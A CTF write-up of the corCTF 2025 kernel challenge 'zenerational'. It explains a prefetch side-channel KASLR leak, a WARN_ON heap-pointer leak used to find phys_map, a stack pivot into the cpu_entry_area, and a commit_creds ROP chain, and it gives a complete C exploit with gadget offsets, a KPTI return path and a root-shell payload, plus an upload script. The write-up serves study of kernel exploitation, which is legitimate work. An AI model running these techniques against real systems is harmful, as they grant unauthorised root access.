Learn cpu_entry_area with corCTF 2025 "zenerational"

Using the (randomized) cpu_entry_area for a stack pivot and ROP in the x86_64 Linux kernel.

Before everything started

At the very end of this August I played corCTF with P1G SEKAI and solved some reverse and crypto chals. However, as a newcomer to kernel pwn, I was completely cooked by all these fantastic kernel chals. My teammates eventually managed to solve one of the three Linux LPEs, and I decided to review those chals and take some notes after the competition ended.

(But it turns out there were so many great CTF events in September, and only now, having finished Flare-on 12, do I finally have some time to write this up.)

In short…

corCTF 2025 had a Linux kernel chal named “zenerational”, which clears values on the current kernel stack region and directly gives you control of RIP.

(Here $rax, which becomes the new $rip, is fully controlled, and $rdi, which equals $rsi, is also fully controlled.)

Since the saved pt_regs structure on the stack is cleared, one solution is to pivot the kernel stack to cpu_entry_area, which contains a region of about 120 bytes whose contents are fully controlled by the user.

However, after Google Project Zero introduced the cpu_entry_area pivot in Dec 2022 and CVE-2023-3640 was assigned, the virtual address of cpu_entry_area is now randomized.

Although we can use a prefetch side channel to leak the KASLR of the .text section, we did not find any usable way to leak the randomized cpu_entry_area directly.
To get the address of cpu_entry_area, the solution provided by kqx is to exploit a WARN_ON_ONCE in the page fault handler to get a debug print and leak some heap addresses (from which we can infer the base address of phys_map).

Why phys_map? @kqx pointed out that cpu_entry_area has a fixed physical address, so from phys_map we get the virtual address of cpu_entry_area in the linear mapping area and are ready to pivot the stack!

After using kropr to search for gadgets, I found the following one:

0xffffffff81605e07 
push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret

In short, we will do the following:

  • Use prefetch to leak KASLR
  • Use WARN_ON_ONCE to leak phys_map
  • Pivot the stack to cpu_entry_area, call commit_creds(&init_cred), and return to user mode to finish privilege escalation.

Full review writeup

Starting from a control flow hijack

The “zenerational” challenge of corCTF 2025 introduces a patch on Linux 6.17.0-rc1:

+SYSCALL_DEFINE2(corctf_crash, uint64_t, addr, uint64_t, val)
+{
+ register uint64_t reg_val = val;
+ register void (*rip)(uint64_t) = (void (*)(uint64_t))addr;
+ asm volatile(".intel_syntax noprefix;"
+ "mov r8, rsp;"
+ "add r8, 0x100;"
+ "mov r9, 0xff;"
+ "not r9;"
+ "and r8, r9;"
+ "mov rcx, r8;"
+ "sub ecx, esp;"
+ "mov rdi, rsp;"
+ "rep stosb;"
+ ".att_syntax prefix;"
+ :::"rcx","rdi","r8","r9","memory","cc");
+ rip(reg_val);
+ __builtin_unreachable();
+}

This gives us an arbitrary indirect call rip(reg_val) with a fully controlled first argument, after erasing the entire kernel stack.
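From userspace this is just one syscall away; a minimal sketch of invoking it (the syscall number 470 is the one used in the full exploit later in this post):

#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>

// Hand the kernel an arbitrary RIP (addr) together with a fully controlled
// first argument (val). The kernel stack is wiped before the indirect call,
// so whatever we jump to cannot rely on anything saved there.
// 470 is the number of the added corctf_crash syscall, taken from the full
// exploit below.
long corctf_crash(uint64_t addr, uint64_t val) {
    return syscall(470, addr, val);
}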

When we have PC control on the latest (6.x) Linux, we might consider:

  • (X) RetSpill, which is a general version of ret2pt_regs, but in this challenge the entire stack is erased, so it will not work. (RetSpill also requires panic_on_oops to be disabled to brute-force the weakly randomized pt_regs offset, but panic_on_oops was enabled in the challenge environment.)
  • (X) Ret2BPF, which is extremely powerful because it can achieve LPE with a leakless control-flow hijack, but BPF is not enabled in the challenge environment.
  • (X) KEPLER, which requires specific copy_to_user and copy_from_user gadgets to leak the canary and start ROP; however, the stack is erased, so we can no longer leak the canary. (It also sometimes requires a phys_map leak.)
  • (?) cpu_entry_area pivot: one of the few remaining options is to pivot the stack to somewhere we control and whose address we know. cpu_entry_area is a good place whose contents we can fully control (up to ~120 bytes), but as just mentioned, its virtual address has been randomized since 2023, so we have to find a way to leak it if we want to use it.

KASLR leaks

kernel .text base

Thanks to the great microarchitecture hackers, all Linux kernels running on real x86_64 CPUs are now vulnerable to side-channel mapping probes, which can leak KASLR easily.
And @will found that those leaks (at least the kernel .text segment leak) work perfectly even with KPTI enabled.
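The measurement primitive behind this is a pair of rdtscp reads around a prefetch; below is a condensed sketch of the flushandreload() helper used in the full exploit at the end of this post (mapped kernel addresses tend to prefetch measurably faster):

#include <stdint.h>

// Time how long the CPU takes to prefetch a candidate kernel address.
// The full exploit repeats this over the KASLR range, keeps the minimum
// per candidate, and treats the fastest candidate as the kernel .text base.
static inline uint64_t time_prefetch(const void *addr) {
    uint64_t lo, hi, start, end;

    asm volatile("mfence; rdtscp; lfence" : "=a"(lo), "=d"(hi) : : "rcx");
    start = (hi << 32) | lo;

    asm volatile("prefetchnta (%0); prefetcht2 (%0)" : : "r"(addr));

    asm volatile("lfence; rdtscp; mfence" : "=a"(lo), "=d"(hi) : : "rcx");
    end = (hi << 32) | lo;

    return end - start;
}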

Randomized address of cpu_entry_area (strong)

However, cpu_entry_area is randomized by randomly selecting per-CPU slot numbers with high entropy:

MAX_CEA = ((1<<39)-4096)//0x3b000 = 0x22b63c

And the final virtual address of cpu_entry_area(cpuid) is calculated with:

(*(long*)((__per_cpu_start + *(long*)(__per_cpu_offset + cpuid*8)))) * 0x3b000 + 0xfffffe0000001000 + 0x1f58

(If KASLR is disabled, (*(long*)((__per_cpu_start + *(long*)(__per_cpu_offset + cpuid*8)))) == cpuid.)
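To make these numbers concrete, here is a tiny sketch that just evaluates the two formulas above (the slot count, and the no-KASLR payload address for cpuid 0):

#include <stdio.h>
#include <stdint.h>

int main(void) {
    // Number of possible cpu_entry_area slots (formula above).
    uint64_t max_cea = ((1ULL << 39) - 4096) / 0x3b000;          // 0x22b63c

    // With KASLR disabled the slot index equals cpuid, so for cpuid 0 the
    // payload address given by the formula above is:
    uint64_t cea0 = 0 * 0x3b000ULL + 0xfffffe0000001000ULL + 0x1f58;

    printf("MAX_CEA = %#lx\n", max_cea);  // 0x22b63c
    printf("cea(0)  = %#lx\n", cea0);     // 0xfffffe0000002f58
    return 0;
}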

Probing all 0x22b63c possible slots would cost more than half an hour and is not feasible for getting a correct result.
In fact, even just probing the 0x6200 possible phys_map base addresses with prefetch is not guaranteed to give a stable result.

(0xffffa10000000000 - 0xffff888000000000) // 0x40000000 = 0x6200

Image: I randomly picked some unmapped addresses and compared their prefetch time with a really mapped address (with KPTI disabled), and the time cost showed basically no difference. Perhaps I used the side channel in the wrong way.

As a result, the newly added virtual address randomization for cpu_entry_area is strong enough and considered safe (for now).

Randomized address of cpu_entry_area (weak)

After the CTF ended, @kqx shared the amazing fact that cpu_entry_area has a fixed physical address, so it always sits at a fixed offset relative to phys_map.

This means that even though the original address of cpu_entry_area is safely randomized, there exists a second mapping of the same cpu_entry_area in the linear mapping at a fixed offset.
(For the same kernel image, the fixed offset may vary with the memory size and the bootloader, but you can easily infer the offset with vmmap in bata24’s gef and check the physical address of the cpu_entry_area.)

Here are the physical offsets observed with the challenge boot script under different memory limits:

  cea(0)       cea(1)     mem
3bc13fc0 -> 13bd13fc0 for 4 G
// direct map differ a lot when mem is crossing 3.5G boundary
7dc13fc0 -> 7de13fc0 for 2 G
3ec13fc0 -> 3ed13fc0 for 1 G
1f413fc0 -> 1f513fc0 for 512 M
// 0xffff888003c00000-0xffff888004000000 0x0000000003c00000-0x0000000004000000
// 0x400000 0x200000 2 [RW- KERN ACCESSED DIRTY]

Under the default config of a 4-level page table Linux system, when KASLR is enabled, phys_map is randomized with PUD_SIZE (0x40000000) as the offset unit.

And as we know, in the Linux kernel, heap virtual addresses live in the linear mapping (phys_map), so leaking any heap pointer (as long as we have not exceeded 1 GiB / PUD_SIZE of memory) tells us the base of phys_map by simply ANDing it with ~(0x40000000 - 1).

Leak a kernel heap pointer with WARN_ON

In kqx’s exploit, they use entry_SYSRETQ_unsafe_stack to do swapgs; sysretq, which requires rcx to be a valid canonical address because it will later be used as the user RIP.
When the control-flow hijack happens, rcx = 0, which is canonical, and returning to user RIP 0 will trigger a page fault.

When the page fault happens, if eflags (which sysret loads from R11) is not 0, a WARN_ON_ONCE in the page fault handler is triggered and gives us a debug print with kernel heap addresses in the general-purpose registers and the GS register.

Here is what we may have once we trigger a WARN_ON(_ONCE):

It won’t crash the kernel, since things only go wrong after we have fully returned to user space.

To read the debug print, we either need to be able to read kernel logs (e.g. through dmesg, but dmesg_restrict is enabled here), or the console log level needs to be at least 5; here we find the log level is 7.
This varies across distributions, but 7 is not that rare in the real world either.
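Putting the leak step together: point the hijacked RIP at entry_SYSRETQ_unsafe_stack and let the resulting page fault do the printing. A sketch, assuming the build-specific 0xffffffff810001ba offset used in the full exploit below:

#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>

// Build-specific address of entry_SYSRETQ_unsafe_stack (taken from the
// full exploit below); kaslr_offset is the slide found via prefetch.
#define ENTRY_SYSRETQ_UNSAFE_STACK 0xffffffff810001baULL

// rcx is 0 after the stack-wiping rep stosb, so sysretq "returns" to user
// RIP 0; the page fault handler then hits its WARN_ON_ONCE and dumps the
// registers (including kernel heap pointers) to the console at loglevel 7.
void trigger_warn_leak(uint64_t kaslr_offset) {
    syscall(470, kaslr_offset + ENTRY_SYSRETQ_UNSAFE_STACK, 0UL);
}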

Kernel ROP

Now that we have the alternative virtual address of cpu_entry_area = (heap_pointer_leak & ~(0x40000000 - 1)) + fixed_offset, we are ready to pivot the stack and do some ROP.
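In code this is just a mask plus the build-specific constant; a sketch, using the 2 GiB cea(0) offset 0x7dc13fc0 from the table above (the exact constant depends on memory size and bootloader):

#include <stdint.h>

#define PUD_SIZE        0x40000000ULL
// Environment-specific physical offset of the cpu_entry_area payload
// inside the direct map (the 2 GiB value from the table above).
#define CEA_PHYS_OFFSET 0x7dc13fc0ULL

// Turn a leaked kernel heap pointer into the linear-mapping alias of the
// cpu_entry_area payload: round the leak down to the phys_map base, then
// add the fixed offset.
uint64_t cea_from_heap_leak(uint64_t heap_leak) {
    uint64_t page_offset_base = heap_leak & ~(PUD_SIZE - 1);
    return page_offset_base + CEA_PHYS_OFFSET;
}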

By the way, I just learned that the legendary figure who first invented ROP in 2007 (wait, ROP is only 18 years old) was teaching at UCSD and now seems to be at UT Austin working on JIT hacking.

Gadget finding

The kernel may modify page permissions, so tools that simply scan binaries for instruction patterns (like ROPGadget) can produce many false positives by disassembling data/constants as if they were executable code.

One solution is to manually specify the virtual address of the kernel executable segment for these tools. Another simpler solution is to use a tool designed for the kernel like kropr.

Note that for efficiency, kropr only searches for very short gadgets by default (6 instructions max). You can increase the limit appropriately to obtain more candidates.

Recall that $rax, which becomes the new $rip, is fully controlled, and $rdi, which equals $rsi, is also fully controlled.

After a little filtering, we may find this pivot gadget with 7 instructions:

0xffffffff81605e07 
push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret

Pivot to cpu_entry_area

We can save all 15 general-purpose registers to cpu_entry_area by triggering a divide error; here is a template from a kCTF writeup:

struct cpu_entry_area_payload {
    uint64_t regs[16];
};

static void sig_handler(int s) {}

static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
    asm volatile (
        "mov %0, %%rsp\n"
        "pop %%r15\n"
        "pop %%r14\n"
        "pop %%r13\n"
        "pop %%r12\n"
        "pop %%rbp\n"
        "pop %%rbx\n"
        "pop %%r11\n"
        "pop %%r10\n"
        "pop %%r9\n"
        "pop %%r8\n"
        "pop %%rax\n"
        "pop %%rcx\n"
        "pop %%rdx\n"
        "pop %%rsi\n"
        "pop %%rdi\n"
        "divq (0x1234000)\n"
        : : "r"(payload)
    );
    __builtin_unreachable();
}

// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
    if (fork()) {
        return;
    }

    struct cpu_entry_area_payload payload = {};

    // Setup payload here

    set_affinity(0); // pin cpu
    signal(SIGFPE, sig_handler);
    signal(SIGTRAP, sig_handler);
    signal(SIGSEGV, sig_handler);
    setsid();

    write_cpu_entry_area(&payload);
}

Return to user mode

In this challenge there is only one CPU core available, so we cannot let one core sleep forever after changing modprobe_path or core_pattern while another core triggers the modprobe or coredump and wins.
(Besides, I don’t know whether this challenge has the STATIC_USERMODEHELPER protection enabled.)

Thus, we will have to return to userland safely after we’ve done the privilege escalation.

Although prepare_kernel_cred(0) no longer returns a root cred after Linux 6.2, we can still use the global init_cred as the root cred and call commit_creds(&init_cred) to set the cred of our task_struct to root.

Since our ROP starts with the pivot gadget push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret, we can pivot to cpu_entry_area - 0x18 so that the pops of the unused r13, r14, rbp consume padding before our precious 15 * 8 controlled bytes.
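To spell out the arithmetic (rsi here is the value we pass as the second argument of the challenge syscall):

#include <stdint.h>

// After "push rsi; ...; pop rsp" the stack pointer equals rsi, so the next
// three pops consume rsi+0x00 / +0x08 / +0x10 (throwaway r13, r14, rbp) and
// the final ret fetches its target from rsi+0x18. Passing rsi = payload - 0x18
// therefore makes the ret land exactly on payload.regs[0].
// (The gadget's "or [rbx+0x41], bl" side effect assumes rbx happens to point
// at writable kernel memory when the hijack fires.)
uint64_t pivot_rsi_for(uint64_t cea_payload_addr) {
    return cea_payload_addr - 0x18;
}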

In this challenge, KPTI is not enabled, so we can just use swapgs; iretq or swapgs; sysret to return to user mode.

sysret restores the user context from registers, so I use iretq, which only requires setting everything up on the kernel stack:

payload.regs[i++] = kaslr_offset + 0xffffffff816e6a8d;  // pop rdi; ret; 
payload.regs[i++] = kaslr_offset + 0xffffffff820611a0; // init_cred
payload.regs[i++] = kaslr_offset + 0xffffffff812c7bc0; // commit_creds
payload.regs[i++] = kaslr_offset + 0xffffffff81ab584a; // swapgs; ret
payload.regs[i++] = kaslr_offset + 0xffffffff81ac20dd; // iretq
payload.regs[i++] = (size_t)&win; // rip
payload.regs[i++] = 0x33; // cs
payload.regs[i++] = 0x3206; // eflags
payload.regs[i++] = (((size_t)&payload) & (~0xf)) + 8; // rsp
payload.regs[i++] = 0x2b; // ss

We’ve done ROP with only 10 * 8 bytes, hooray!

When KPTI is enabled

If we want to move one step further and enable KPTI, the only extra thing we need to do is switch the page table before we return to user mode.

Here I use the gadget from swapgs_restore_regs_and_return_to_usermode, starting from the mov rdi, rsp; mov rsp, gs: part to skip the register-restoring part.

The only difference here is that we need two extra elements, a fake rax and a fake rdi:

payload.regs[i++] = kaslr_offset + 0xffffffff816e6a8d;  // pop rdi;ret; 
payload.regs[i++] = kaslr_offset + 0xffffffff820611a0; // init_cred
payload.regs[i++] = kaslr_offset + 0xffffffff812c7bc0; // commit_creds
payload.regs[i++] = kaslr_offset + 0xffffffff81000f37; //swapgs_restore_regs_and_return_to_usermode -> mov rdi, rsp; mov rsp,gs: ...
payload.regs[i++] = 0; // fake rax
payload.regs[i++] = 0; // fake rdi
payload.regs[i++] = (size_t)&win; // rip
payload.regs[i++] = 0x33; // cs
payload.regs[i++] = 0x3206; // eflags
payload.regs[i++] = (((size_t)&payload) & (~0xf)) + 8; // rsp
payload.regs[i++] = 0x2b; // ss

Complete Exploit

#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <syscall.h>
#include <stdint.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>


static inline __attribute__((always_inline))
long __raw_syscall(long n,
long a1, long a2, long a3,
long a4, long a5, long a6) {
register long rax __asm__("rax") = n;
register long rdi __asm__("rdi") = a1;
register long rsi __asm__("rsi") = a2;
register long rdx __asm__("rdx") = a3;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ volatile("syscall"
: "+a"(rax)
: "D"(rdi), "S"(rsi), "d"(rdx), "r"(r10), "r"(r8), "r"(r9)
: "rcx", "r11", "memory", "cc");
return rax;
}

/* ===== Small helpers for 0..6 args ===== */

#define __RS_HELPER_0(n) __raw_syscall((n), 0,0,0,0,0,0)
#define __RS_HELPER_1(n,a1) __raw_syscall((n),(long)(a1),0,0,0,0,0)
#define __RS_HELPER_2(n,a1,a2) __raw_syscall((n),(long)(a1),(long)(a2),0,0,0,0)
#define __RS_HELPER_3(n,a1,a2,a3) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),0,0,0)
#define __RS_HELPER_4(n,a1,a2,a3,a4) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),(long)(a4),0,0)
#define __RS_HELPER_5(n,a1,a2,a3,a4,a5) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),(long)(a4),(long)(a5),0)
#define __RS_HELPER_6(n,a1,a2,a3,a4,a5,a6) __raw_syscall((n),(long)(a1),(long)(a2),(long)(a3),(long)(a4),(long)(a5),(long)(a6))

#define __RS_SELECT(_0,_1,_2,_3,_4,_5,_6,NAME,...) NAME

/* raw_syscall: returns raw kernel value (negative == -errno) */
#define raw_syscall(...) \
__RS_SELECT(__VA_ARGS__, \
__RS_HELPER_6, __RS_HELPER_5, __RS_HELPER_4, \
__RS_HELPER_3, __RS_HELPER_2, __RS_HELPER_1, \
__RS_HELPER_0) (__VA_ARGS__)

#include <sched.h>
#include <stdio.h>
#include <stdint.h>

#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

size_t bypass_kaslr();

struct cpu_entry_area_payload {
uint64_t regs[16];
};

static void sig_handler(int s) {}

static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
asm volatile (
"mov %0, %%rsp\n"
"pop %%r15\n"
"pop %%r14\n"
"pop %%r13\n"
"pop %%r12\n"
"pop %%rbp\n"
"pop %%rbx\n"
"pop %%r11\n"
"pop %%r10\n"
"pop %%r9\n"
"pop %%r8\n"
"pop %%rax\n"
"pop %%rcx\n"
"pop %%rdx\n"
"pop %%rsi\n"
"pop %%rdi\n"
"divq (0x1234000)\n"
: : "r"(payload)
);
__builtin_unreachable();
}

void set_affinity(int cpuid){
cpu_set_t my_set;
int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

if (cpu_cores == 1) return;

CPU_ZERO(&my_set);

CPU_SET(cpuid, &my_set);

if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
exit(EXIT_FAILURE);
}
}

void win(){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
printf("[!] Uid: %d\n", getuid());
system("id");
system("cat /root/flag.txt");
puts("Spawning shell");
system("/bin/sh");
}

size_t kaslr_offset = 0;

static void setup_cpu_entry_area() {
if (fork()) {
return;
}
// size_t user_cs, user_ss, user_rflags, user_sp;
struct cpu_entry_area_payload payload = {};

int i=0;
payload.regs[i++] = kaslr_offset + 0xffffffff816e6a8d; // pop rdi; ret;
payload.regs[i++] = kaslr_offset + 0xffffffff820611a0; // init_cred
payload.regs[i++] = kaslr_offset + 0xffffffff812c7bc0; // commit_creds
payload.regs[i++] = kaslr_offset + 0xffffffff81000f37; // swapgs_restore_regs_and_return_to_usermode -> mov rdi, rsp; mov rsp, gs:

payload.regs[i++] = 0; // fake rax
payload.regs[i++] = 0; // fake rdi
payload.regs[i++] = (size_t)&win; // rip
payload.regs[i++] = 0x33; // cs
payload.regs[i++] = 0x3206; // eflags
payload.regs[i++] = (((size_t)&payload) & (~0xf)) + 8; // rsp
payload.regs[i++] = 0x2b; // ss

payload.regs[i++] = 0; //
payload.regs[i++] = 0; //
payload.regs[i++] = 0; //
payload.regs[i++] = 0; // max 15 regs

set_affinity(0);
signal(SIGFPE, sig_handler);
signal(SIGTRAP, sig_handler);
signal(SIGSEGV, sig_handler);
setsid();

write_cpu_entry_area(&payload);
}

size_t flushandreload(void* addr);

int main(int argc, char **argv) {
setbuf(stdout, NULL);
setbuf(stderr, NULL);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
set_affinity(0);
kaslr_offset = bypass_kaslr() - 0xffffffff81000000;
printf("Using kernel base %p\n", (void *)kaslr_offset + 0xffffffff81000000);

if (argc > 1) {
printf("Using kernel offset %p\n", (void *)kaslr_offset);
size_t page_offset_base = atol(argv[1]);
page_offset_base &= 0xffffffffc0000000;
printf("Using page base %p\n", (void *)page_offset_base);
size_t cea = page_offset_base + 0x7dc13f40; // 0x18: r13, r14, rbp
printf("using cea %p\n", (void *)cea);
setup_cpu_entry_area();
puts("!!!");
getchar();
// 0xffffffff81605e07 start with: push rsi; or [rbx+0x41], bl; pop rsp; pop r13; pop r14; pop rbp; ret
raw_syscall(470, kaslr_offset + 0xffffffff81605e07, cea);
} else {
raw_syscall(470, kaslr_offset + 0xffffffff810001ba, 0);
}
}

inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
uint64_t a, d;
asm volatile ("mfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"xor %%rax, %%rax\n\t"
"lfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}

inline __attribute__((always_inline)) uint64_t rdtsc_end() {
uint64_t a, d;
asm volatile(
"xor %%rax, %%rax\n\t"
"lfence\n\t"
"RDTSCP\n\t"
"mov %%rdx, %0\n\t"
"mov %%rax, %1\n\t"
"mfence\n\t"
: "=r" (d), "=r" (a)
:
: "%rax", "%rbx", "%rcx", "%rdx");
a = (d<<32) | a;
return a;
}


void prefetch(void* p) {
asm volatile (
"prefetchnta (%0)\n"
"prefetcht2 (%0)\n"
: : "r" (p));
}

size_t flushandreload(void* addr) { // row miss
size_t time = rdtsc_begin();
prefetch(addr);
size_t delta = rdtsc_end() - time;
return delta;
}


size_t bypass_kaslr() {
size_t base = 0;
#define OFFSET 8
#define START (0xffffffff81000000ull + OFFSET)
#define END (0xffffffffD0000000ull + OFFSET)
#define STEP 0x0000000000200000ull
#define NUM_TRIALS 11
while (1) {
size_t bases[NUM_TRIALS] = {0};
for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
size_t times[(END - START) / STEP] = {};
uint64_t addrs[(END - START) / STEP];

for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
times[ti] = ~0;
addrs[ti] = START + STEP * (size_t)ti;
}

for (int i = 0; i < 16; i++) {
for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
size_t addr = addrs[ti];
size_t t = flushandreload((void*)addr);
if (t < times[ti]) {
times[ti] = t;
}
}
}

size_t minv = ~0;
size_t mini = -1;
for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
if (times[ti] < minv) {
mini = ti;
minv = times[ti];
}
}

if (mini < 0) {
return -1;
}

bases[vote] = addrs[mini];
}

int c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (c == 0) {
base = bases[i];
} else if (base == bases[i]) {
c++;
} else {
c--;
}
}

c = 0;
for (int i = 0; i < ARRAY_LEN(bases); i++) {
if (base == bases[i]) {
c++;
}
}
if (c > ARRAY_LEN(bases) / 2) {
base -= OFFSET;
break;
}
}
// base -= STEP;
return base;
}

I use this python script to upload and run the exploit:

import os, base64, gzip, re
from pwn import *
from tqdm import tqdm
import subprocess

TMP_PATH = "/home/ctf"
SEP = b"ctf@corctf"


os.system("musl-gcc --static 1.c -o exploit")
with open("exploit", "rb") as f_in, gzip.open("exp.gz", "wb") as f_out:
    f_out.write(f_in.read())

with open("exp.gz", "rb") as f:
    exp = base64.b64encode(f.read())

# p = remote("remote", 11337)
p = process(['./run.sh'])

_ = p.recvuntil(SEP).decode()
for i in range(0, len(exp), 0x200):
    p.sendline(b"echo -n \"" + exp[i:i + 0x200] + f"\" >> {TMP_PATH}/b64_exp".encode())

for i in tqdm(range(0, len(exp), 0x200)):
    p.recvuntil(SEP)

p.sendline(b"ls")
p.sendlineafter(SEP, f"cat {TMP_PATH}/b64_exp | base64 -d > {TMP_PATH}/exp.gz".encode())
p.sendlineafter(SEP, f"gzip -dc {TMP_PATH}/exp.gz > {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"chmod +x {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"{TMP_PATH}/exploit".encode())
r = p.recvuntil(b'Segmentation fault').decode()
print(r)
leak = int(re.findall(r'R14: ([0-9a-f]+) R15: ', r)[0], 16)
print(f"leak: {hex(leak)}")
p.sendlineafter(SEP, f"{TMP_PATH}/exploit {leak}".encode())
print(p.recvuntil(b'!!!').decode())
p.sendline(b'whoami')
print(p.recvuntil(b'Spawning shell').decode())
p.interactive()

Now we have the root shell:

After Notes

The original challenge attachment can be downloaded at: https://github.com/Crusaders-of-Rust/corctf-2025-public-challenge-repo/tree/master/pwn/zenerational-aura

About randomization

Although cpu_entry_area is randomized, the read-only IDT at the beginning of 0xfffffe0000000000 (0x1000 bytes long) is still not randomized (and it is maybe one of the few addresses not randomized on the latest x86_64 Linux kernels as of 2025).

Although the user should not be able to control the values inside [0xfffffe0000000000, 0xfffffe0000001000), there are a lot of kernel function pointers and null pointers in it, and at 0xfffffe0000000164 we even have writable kernel addresses.

Besides information leaks (say we have an arbitrary read but don’t know where to read), those fixed addresses may also be useful for bypassing some side effects when dealing with other kernel exploits. For example:

Before we reach the code that leads to the control-flow hijack, there is a pointer dereference that requires the target to be writable or a nullptr. We must forge a valid pointer, otherwise the kernel will crash or will not execute the vulnerable path.
Now, with these function pointers, null pointers, and writable pointers at fixed addresses, such side effects (constraints / restrictions) can be bypassed (satisfied) without any heap spray or information leak.
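A minimal sketch of that idea, using the fixed addresses quoted above (illustrative only; whether they satisfy a given constraint depends on the exact check):

#include <stdint.h>

// Non-randomized addresses mentioned above: the read-only IDT page and a
// location inside it that holds writable kernel addresses.
#define FIXED_IDT_BASE       0xfffffe0000000000ULL
#define FIXED_WRITABLE_PTRS  0xfffffe0000000164ULL

// If a vulnerable path dereferences an attacker-supplied pointer and only
// proceeds when it reads a NULL, a kernel function pointer, or a writable
// kernel address, these fixed locations can serve as the forged pointer
// without any leak or heap spray.
uint64_t forge_constraint_pointer(int need_writable_target) {
    return need_writable_target ? FIXED_WRITABLE_PTRS : FIXED_IDT_BASE;
}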

@kqx also provided some interesting discussion of cpu_entry_area.

About KPTI

@will showed that KPTI cannot stop prefetch from leaking the kernel .text address, even though in user mode it is supposed to map only user pages and a small amount of kernel code (the syscall entry, for example).

And with KPTI enabled, we can still get the debug print from WARN_ON_ONCE when we return to user mode, access address 0, and trigger the page fault.

However, ret2usr is no longer available once KPTI is enabled: although the kernel still has the full mapping of the user space program, every user page is marked as NX by KPTI.

This means that even if we can disable SMEP, there is still an NX bit set to 1 that prevents us from executing user shellcode in kernel mode.

What if we have even more power and can disable NXE for the CPU (by modifying EFER)? We still cannot execute user shellcode: when NXE is disabled, the NX bit is treated as “reserved” by the CPU and asserted to be zero, so if NX = 1 the CPU will refuse to execute the page even with NXE disabled.

However, if we can disable SMAP, we can still fetch data from user space, for example to do a longer ROP chain.
